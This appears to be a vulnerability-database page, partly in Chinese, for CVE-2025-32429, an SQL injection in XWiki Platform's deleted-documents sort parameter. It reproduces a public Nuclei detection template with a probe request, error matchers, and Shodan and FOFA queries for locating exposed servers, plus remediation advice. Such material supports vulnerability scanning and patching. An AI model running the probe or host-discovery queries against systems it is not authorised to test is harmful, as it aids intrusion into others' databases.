CVE-2025-32429: XWiki Platform - SQL Injection

日期: 2025-11-07 | 影响软件: XWiki Platform | POC: 已公开

漏洞描述

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2, it's possible for anyone to inject SQL using the parameter sort of the getdeleteddocuments.vm. It's injected as is as an ORDER BY value.

PoC代码[已公开]

id: CVE-2025-32429

info:
  name: XWiki Platform - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2, it's possible for anyone to inject SQL using the parameter sort of the getdeleteddocuments.vm. It's injected as is as an ORDER BY value.
  impact: |
    Authenticated attackers with access to the deleted documents trash feature could inject SQL code, leading to data leakage, database modification, or further compromise of the application.
  remediation: |
    Upgrade to XWiki Platform version 16.10.6 and 17.3.0-rc-1. (or newer) which addresses this vulnerability. Always validate and sanitize user-controlled input for query parameters.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-23093
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32429
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32429
    epss-score: 0.15873
    epss-percentile: 0.94463
    cwe-id: CWE-89
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,hqli,sqli,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=injected"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Exception", "org.xwiki.livedata.LiveDataException", "HqlQueryScriptService")'
          - 'contains(content_script_type, "text/javascript")'
          - 'status_code == 500'
        condition: and
# digest: 490a004630440220712c0f74ae2b43a318ce05092b9e4ee5a9e100713f9bdb32d027d2b8e04334660220037cd5174eb9cc0eb70067e8f142b459f9c8700d5617443c302acc79751bcc64:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-32429.yaml

相关漏洞推荐